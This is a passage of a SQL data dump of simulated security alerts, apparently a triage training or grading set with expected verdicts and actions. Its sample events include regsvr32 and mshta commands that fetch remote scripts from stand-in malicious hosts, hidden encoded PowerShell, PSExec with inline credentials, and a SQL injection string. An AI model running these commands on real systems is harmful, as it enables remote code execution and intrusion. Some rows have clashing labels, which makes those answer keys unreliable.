attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'), (662, 'Malicious Email with Phishing URL Detected', 'critical', 'Proofpoint', 'An email containing a known phishing URL was received, potentially targeting user credentials.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"no-reply@securebank.com\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"url\":\"http://securebank-login.com\"}', '2026-01-11 10:11:51', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://securebank-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing URL attempting to steal banking credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@securebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain resembling legitimate bank.\"}}],\"expected_actions\":[\"block_url\",\"notify_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing URL detected in email, posing a threat to user credentials.\"}', 'Advanced', 'SIEM', 7, 1, 'FINANCE'), (663, 'Lateral Movement via PSExec Detected', 'high', 'CrowdStrike', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"svc_admin\",\"hostname\":\"SRV-APP01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\"}', '2026-01-10 21:33:29', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage detected, commonly used for lateral movement by attackers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from internal to internal IPs suggests lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (664, 'SQL Injection Attempt on Public Web Application', 'high', 'IDS/IPS', 'A potential SQL injection attack was detected targeting the login page of a public web application.', 'Web Attack', 'T1505', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://webapp.local/login\"}', '2026-01-10 00:59:01', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}}],\"expected_actions\":[\"block_ip\",\"monitor_application\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt detected via suspicious payload on login page.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'), (665, 'Data Exfiltration Detected via Suspicious Network Connection', 'critical', 'Firewall', 'A large amount of data was transferred to an external IP, indicating potential data exfiltration.', 'Data Exfil', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.14\",\"dst_ip\":\"198.51.100.75\",\"username\":\"nmartin\",\"hostname\":\"FILE-SRV01\",\"data_volume\":\"1.5GB\"}', '2026-01-10 00:24:48', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for numerous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious data transfer.\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data volume transferred to a known malicious IP suggests data exfiltration.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'), (666, 'False Positive: Legitimate Certutil Activity Misclassified as Malicious', 'medium', 'SIEM', 'Certutil was executed on a user machine, typically flagged for potential malware download, but verified as a legitimate use case.', 'Malware', 'T1218.010', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.18\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jane.smith\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"certutil.exe -addstore MyCompanyCert\"}', '2026-01-10 06:39:03', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -addstore MyCompanyCert\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"This use of certutil is legitimate as part of company policy.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.3.18\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil activity verified as legitimate based on internal policy use case.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL'), (667, 'Suspicious Regsvr32 Execution Detected', 'high', 'EDR', 'Regsvr32 was executed with a suspicious scriptlet URL, typical of a fileless malware attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.22\",\"dst_ip\":\"192.168.1.11\",\"username\":\"mroberts\",\"hostname\":\"DESKTOP-ROBERTS\",\"command_line\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-01-10 11:54:15', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 with URL pointing to a known malicious site.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.4.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 execution with external scriptlet URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (668, 'False Positive: Legitimate Application Misidentified as Malware', 'medium', 'EDR', 'A legitimate application was flagged as suspicious due to anomalous behavior, but verified as a false positive.', 'Malware', 'T1204.002', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T21:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.25\",\"dst_ip\":\"192.168.1.12\",\"username\":\"kclark\",\"hostname\":\"FINANCE-PC\",\"command_line\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\"}', '2026-01-10 14:40:07', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"The application is verified as legitimate and safe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged application was verified as legitimate and safe, confirming a false positive.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (669, 'Unauthorized Access Attempt on Database Server', 'high', 'SIEM', 'A potentially unauthorized access attempt was detected on a critical database server from an internal IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T22:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.6.33\",\"dst_ip\":\"192.168.1.13\",\"username\":\"dba_admin\",\"hostname\":\"DB-SERVER\",\"failed_attempts\":15}', '2026-01-10 10:37:44', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.6.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address attempting unauthorized access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"dba_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for unauthorized access attempts.\"}}],\"expected_actions\":[\"reset_credentials\",\"monitor_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts indicate potential unauthorized access.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH'), (670, 'False Positive: Misinterpreted Network Activity as Data Exfiltration', 'medium', 'Firewall', 'Network activity flagged as potential data exfiltration was verified to be a legitimate backup process.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.7.44\",\"dst_ip\":\"192.168.1.14\",\"username\":\"backup.svc\",\"hostname\":\"BACKUP-SERVER\",\"data_volume\":\"2.0GB\"}', '2026-01-10 09:03:09', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.7.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address engaged in backup process.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup.svc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for legitimate backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network activity verified as legitimate backup process, confirming a false positive.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'), (671, 'Suspicious Mshta Execution with Malicious Script', 'critical', 'EDR', 'Mshta was executed with a malicious remote script, indicating a potential fileless malware attack.', 'Malware', 'T1218.005', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.8.55\",\"dst_ip\":\"192.168.1.15\",\"username\":\"tjohnson\",\"hostname\":\"WORKSTATION-TJ\",\"command_line\":\"mshta http://malicious-site.com/malicious-script.hta\"}', '2026-01-10 20:15:05', '2026-01-11 14:56:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious-script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of a remote HTA script, typical of fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.8.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Mshta execution with external script URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (672, 'Suspicious Network Connection Detected from Internal to External Host', 'high', 'CrowdStrike', 'A connection attempt was detected from an internal host to a known malicious IP address used for command and control.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.42\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -encodedcommand SGVsbG8gd29ybGQ=\",\"domain\":\"malicious-site.com\"}', '2026-01-11 03:07:07', '2026-01-11 14:57:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known malicious IP indicates a true positive for malware communication.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (673, 'Multiple Failed Login Attempts Detected from Foreign IP', 'medium', 'Wazuh', 'A foreign IP address has attempted to login into the corporate VPN with multiple failed attempts, indicating a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:00:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"vpn-server\",\"failed_attempts\":25}', '2026-01-10 22:06:55', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (674, 'APT Command and Control Communication via Discord', 'critical', 'Splunk', 'Detected command and control traffic using Discord\'s infrastructure, commonly used by APT groups for stealthy communications.', 'Data Exfiltration', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.5\",\"dst_ip\":\"162.159.138.233\",\"username\":\"alice\",\"hostname\":\"laptop-23\",\"url\":\"https://discordapp.com/api/v9/channels/1234567890/messages\"}', '2026-01-11 12:40:32', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.138.233\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with Discord C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/v9/channels/1234567890/messages\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Discord API endpoint used for stealthy data exfiltration\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Discord for C2 traffic is indicative of advanced threat activity.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'), (675, 'Phishing Attempt via Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was sent to an employee with a spoofed domain mimicking a legitimate service to steal credentials.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"bsmith\",\"hostname\":\"mail-server\",\"email_sender\":\"support@microsfot.com\",\"url\":\"http://fake-login.microsoft.com\"}', '2026-01-10 19:17:54', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@microsfot.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-login.microsoft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for harvesting credentials\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are indicative of a phishing attempt to harvest credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (676, 'Detected Fileless Malware Execution', 'critical', 'EDR', 'A fileless malware was executed in memory using PowerShell, evading traditional file-based detection mechanisms.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.15\",\"dst_ip\":\"192.168.100.15\",\"username\":\"jsmith\",\"hostname\":\"desktop-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 11:56:38', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command for fileless malware execution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated file, possible fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell for in-memory execution indicates advanced evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (677, 'Suspicious DNS Queries to DGA Domain', 'high', 'Firewall', 'Detected multiple DNS queries to a domain generated by a domain generation algorithm (DGA), often used for botnet communications.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.10.25\",\"dst_ip\":\"198.51.100.50\",\"username\":\"tadmin\",\"hostname\":\"office-pc\",\"domain\":\"a1b2c3d4e5f6g7h8.com\"}', '2026-01-09 22:50:34', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"a1b2c3d4e5f6g7h8.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA botnet activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the querying host\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of DGA domains in DNS queries suggests botnet communication.\"}', 'Expert', 'MAL', 9, 1, 'GOVERNMENT'), (678, 'Web Attack: SQL Injection Attempt Detected', 'high', 'IDS/IPS', 'An attacker attempted an SQL injection attack on the corporate web application, potentially exploiting vulnerabilities to exfiltrate data.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.100\",\"username\":\"guest\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-09 20:58:06', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body indicates a classic SQL injection attempt, warranting investigation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (679, 'Unauthorized Access Attempt via PSExec', 'critical', 'EDR', 'Detected unauthorized use of PSExec for lateral movement within the network, indicating a potential compromise of administrative credentials.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"192.168.20.20\",\"username\":\"administrator\",\"hostname\":\"server-01\",\"command_line\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\"}', '2026-01-10 04:57:21', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of unauthorized PSExec execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec command used for unauthorized access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrative credentials suggests lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (680, 'Innocuous User Activity Mistaken for Attack', 'low', 'SIEM', 'A legitimate user activity was flagged as suspicious due to unusual but authorized access patterns.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.30.5\",\"dst_ip\":\"192.168.30.10\",\"username\":\"jane.doe\",\"hostname\":\"desktop-01\",\"request_body\":\"\"}', '2026-01-09 22:30:49', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.30.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Management System\",\"verdict\":\"clean\",\"details\":\"Authorized user with legitimate access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was flagged due to unusual login patterns but was found to be legitimate upon review.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (681, 'Phishing Email Detected with Clean URL', 'medium', 'Email Gateway', 'A phishing email was detected; however, the URL was verified as clean after further analysis.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:40:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.5.10\",\"username\":\"mjohnson\",\"hostname\":\"mail-server\",\"email_sender\":\"info@securemail.com\",\"url\":\"http://legitimate-site.com\"}', '2026-01-10 17:07:54', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with previous phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://legitimate-site.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was initially flagged due to the sender\'s history, but the URL was found to be legitimate.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'), (682, 'DNS Query to Benign Domain Mistaken for DGA', 'low', 'Firewall', 'A DNS query was flagged for potential DGA activity, but the domain was verified as part of legitimate testing activity.', 'Malware', 'T1568', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.40.5\",\"dst_ip\":\"192.168.40.5\",\"username\":\"qauser\",\"hostname\":\"test-machine\",\"domain\":\"test-domain-1234.com\"}', '2026-01-11 07:40:24', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"test-domain-1234.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain used for internal testing purposes\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.40.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP address of a test machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain was mistaken for a DGA domain but is used for legitimate testing.\"}', 'Expert', 'MAL', 9, 1, 'OT_ICS'), (683, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike Beacon associated with LockBit 3.0 ransomware was detected communicating with a known malicious IP. Indicators show initial access was achieved via compromised RDP credentials.', 'Malware', 'T1071', 1, 'New', NULL, 